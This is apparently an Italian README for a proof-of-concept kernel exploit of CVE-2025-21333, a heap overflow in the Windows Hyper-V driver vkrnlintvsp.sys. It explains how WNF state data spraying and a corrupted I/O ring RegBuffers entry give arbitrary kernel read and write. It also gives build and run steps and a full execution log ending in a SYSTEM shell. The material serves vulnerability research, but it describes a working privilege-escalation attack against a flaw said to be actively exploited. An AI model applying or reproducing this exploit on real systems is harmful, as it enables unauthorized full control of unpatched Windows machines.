
Exploit POC per il buffer overflow basato su heap CVE-2025-21333. Sfrutta i dati di stato WNF e l'I/O ring IOP_MC_BUFFER_ENTRY.
Proof of Concept che sfrutta CVE-2025-21333 in vkrnlintvsp.sys (non molto affidabile, vedere la sezione Requisiti e limitazioni). Nella sezione Riferimenti si trovano risorse molto utili per chi vuole giocare con l'exploit.
Un'analisi dettagliata della vulnerabilità e dell'exploit è disponibile qui.
La vulnerabilità è stata rilevata come sfruttata attivamente da attori delle minacce.
Testato su Windows 11 23h2.
Potrebbe funzionare anche su Windows 11 24h2 ma non l'ho testato.
Di seguito l'hash dei file ntoskrnl.exe e vkrnlintvsp.sys che sono stati usati per testare il POC.
PS C:\Windows\System32\drivers> get-filehash .\vkrnlintvsp.sys
Algorithm Hash Path
--------- ---- ----
SHA256 28948C65EF108AA5B43E3D10EE7EA7602AEBA0245305796A84B4F9DBDEDDDF77 C:\Windows\System32\drivers\v...
PS C:\Windows\System32\drivers>
PS C:\Windows\System32> Get-FileHash ntoskrnl.exe
Algorithm Hash Path
--------- ---- ----
SHA256 999C51D12CDF17A57054068D909E88E1587A9A715F15E0DE9E32F4AA4875C473 C:\Windows\System32\ntoskrnl.exe
PS C:\Windows\System32>
Non usa NtQuerySystemInformation per divulgare indirizzi del kernel né PreviousMode per ottenere lettura/scrittura arbitraria.
Invece, alloca nel Paged Pool un array di puntatori a _IOP_MC_BUFFER_ENTRY e sovrascrive il primo puntatore con un IOP_MC_BUFFER_ENTRY* malevolo situato nello spazio utente. Usando BuildIoRingWriteFile()/BuildIoRingReadFile() è possibile ottenere lettura/scrittura arbitraria nel kernel.
L'array di puntatori a _IOP_MC_BUFFER_ENTRY è un oggetto con PoolTag IrRB.
La tecnica differisce leggermente da quella documentata da Yarden Shafir qui. Invece di prendere il controllo dell'intero array puntato da _IORING_OBJECT.RegBuffers, la tecnica prende il controllo solo di una voce nell'array puntato da _IORING_OBJECT.RegBuffers.
Poiché la dimensione dell'array di puntatori è controllabile dall'utente, ciò significa che può essere utilizzato per ottenere una lettura/scrittura arbitraria affidabile in ring0 a partire da heap-overflow e UAF per diversi bucket LFH.
Non so se qualcuno abbia già condiviso questa tecnica per sfruttare overflow o UAF nel paged pool.
Questi screenshot sono stati scattati dopo l'esecuzione del poc. L'overflow era nel bucket per oggetti di dimensione 0x50. Nota che è stato possibile allocare un array RegBuffers in quel bucket e il primo puntatore punta a memoria nello spazio utente.

Nota che la voce malevola imposta Address su un oggetto processo. Address corrisponde all'indirizzo arbitrario da cui potremmo voler leggere/scrivere (questo è già ben descritto nell'articolo di Yarden Shafir).

È necessario attivare la funzionalità Windows Sandbox affinché le syscall vulnerabili vengano gestite dal driver vulnerabile.

Sono riuscito a ottenere un overflow di 0xfff0 byte. Non sono riuscito a rendere la lunghezza dell'overflow completamente controllabile. Si può vedere un crash se l'overflow è più grande del sottosegmento (può accadere abbastanza spesso). Forse sprayando più oggetti è possibile minimizzare questo comportamento.
Il poc libera 2 dati di stato WNF per riallocare in quelle posizioni un regBuffer (un array di puntatori a _IOP_MC_BUFFER_ENTRY associato a un IORING_OBJECT) e un PipeAttribute. A volte, tra la free e la riallocazione, può accadere che un altro oggetto venga allocato in quella posizione da un altro driver. Sarebbe possibile usare altri oggetti WNF state data corrotti in un ciclo while per eseguire più tentativi di riallocazione e aumentare la possibilità di ottenere il layout desiderato.
Il codice del poc è piuttosto disordinato.
Dopo aver ottenuto system, è meglio uscire dalla shell di sistema digitando exit nella console, altrimenti la macchina andrà in crash.
Compilare la versione Release x64.
Eseguire e ottenere una shell di sistema.
PS C:\Users\unpriv> .\CVE-2025-21333-POC.exe
Preparing...
[*] fNtCreateCrossVmEvent = 00007FFD6BC31690
[*] fNtQueryInformationProcess = 00007FFD6BC304E0
[!] WindowsSandboxClient.exe process not found
[*] spawning windows sandbox
[*] CreateProcessA returned successfully
[*] NtQueryInformationProcess returned successfully
[*] peb_addr = 0000000100335000
[*] ReadProcessMemory returned successfully
[*] ProcessParameters = 00000147B06A6430
[*] ReadProcessMemory returned successfully
[*] CommandLine = 00000147B06A6ADA
[*] CommandLine_size = 3f0
[*] commandline = C:\Windows\system32\WindowsSandboxClient.exe <ContainerId>19a1ef14-ee35-47d8-8bdb-cf4c86272272</ContainerId><AccountUser>WDAGUtilityAccount</AccountUser><AccountPassword>66387310-a27d-4a59-a688-3ab018388c9e</AccountPassword><AudioInputEnabled>true</AudioInputEnabled><ClipboardRedirectionEnabled>true</ClipboardRedirectionEnabled><RebootSupported>true</RebootSupported><SmartCardRedirectionEnabled>false</SmartCardRedirectionEnabled><FullScreenMode>false</FullScreenMode><TargetDisplay>0</TargetDisplay>
[*] extracted guid = 19a1ef14-ee35-47d8-8bdb-cf4c86272272
[*] s_guid = 19a1ef14-ee35-47d8-8bdb-cf4c86272272
Created GUID
extracted guid
0x000000: 14 ef a1 19 35 ee d8 47 8b db cf 4c 86 27 22 72 ....5..G...L.'"r
guid
0x000000: 14 ef a1 19 35 ee d8 47 8b db cf 4c 86 27 22 72 ....5..G...L.'"r
Triggering vuln creating crossvmevent...
max corrupted WNF
state: a18d294541c64e6d val: 0 dataSize: 10040
calling NtqueryWnfStateData on max_corrupted with max_corrupted->state a18d2945a18d2945 and datasize10040
buffer content
[+] found WNF to be freed and replaced with RegBuffers
offset 30
[+] found WNF to be freed and replaced with PipeAttribute
offset2 80
updating regBuffersControllerWNF
calling NtUpdateWnfStateData on tokenReaderWNF->state a18d2945a18d2945 and datasize10040
calling NtUpdateWnfStateData returned successfully
[*] retrieving WNF with content 0x4343434343434343
[*] retrieving WNF with content 0x4444444444444444
searching in statenames2
found corrupted WNF: a18d514541c64e6dval: 4343434343434343
found corrupted WNF: a18d614541c64e6dval: 4444444444444444
found1 1 found2 1
found1 1 found2 1
found1 1 found2 1
0x000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000030: 00 00 05 0b 49 72 52 42 64 b9 76 d3 e4 ff d1 c6 ....IrRBd.v.....
0x000040: a0 a1 b1 f1 09 e3 ff ff 00 00 00 00 00 00 00 00 ................
0x000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000080: 00 00 05 03 4e 70 41 74 00 00 00 00 00 00 00 00 ....NpAt........
0x000090: d0 01 2b 47 0a d1 ff ff d0 01 2b 47 0a d1 ff ff ..+G......+G....
0x0000a0: 38 81 2a 4d 0a d1 ff ff 16 00 00 00 00 00 00 00 8.*M............
0x0000b0: 3a 81 2a 4d 0a d1 ff ff 5a 00 41 41 41 41 41 41 :.*M....Z.AAAAAA
0x0000c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0x0000d0: 00 00 05 03 57 6e 66 20 42 42 42 42 42 42 42 42 ....Wnf BBBBBBBB
0x0000e0: 00 00 00 00 50 ff 00 00 50 ff 00 00 01 00 00 00 ....P...P.......
0x0000f0: 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000120: 00 00 05 03 57 6e 66 20 42 42 42 42 42 42 42 42 ....Wnf BBBBBBBB
0x000130: 00 00 00 00 00 ff 00 00 00 ff 00 00 01 00 00 00 ................
0x000140: 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
[+] regBuffers found and can be overwritten
[+] pipeAttribute found and can be read
[*] original_regBufferEntry: ffffe309f1b1a1a0
[*] pipeAttributeFlink: ffffd10a472b01d0
[+] found target handle
[*] targetHandle: 00000211216BC4D0
[*] ioring index: 425
[*] fileObject: ffffe309f134d7e0
[*] base of npfs.sys: fffff80631660000
[*] base of ntoskrnl.exe: fffff80628c00000
[*] system EPROCESS: ffffe309ea4c2040
[*] system TOKEN: ffffd10a3a246040
[*] curpid: 21c8
Microsoft Windows [Version 10.0.22631.4460]
(c) Microsoft Corporation. All rights reserved.
C:\Users\unpriv>whoami
nt authority\system
C:\Users\unpriv>exit
calling NtUpdateWnfStateData returned successfully
PS C:\Users\unpriv>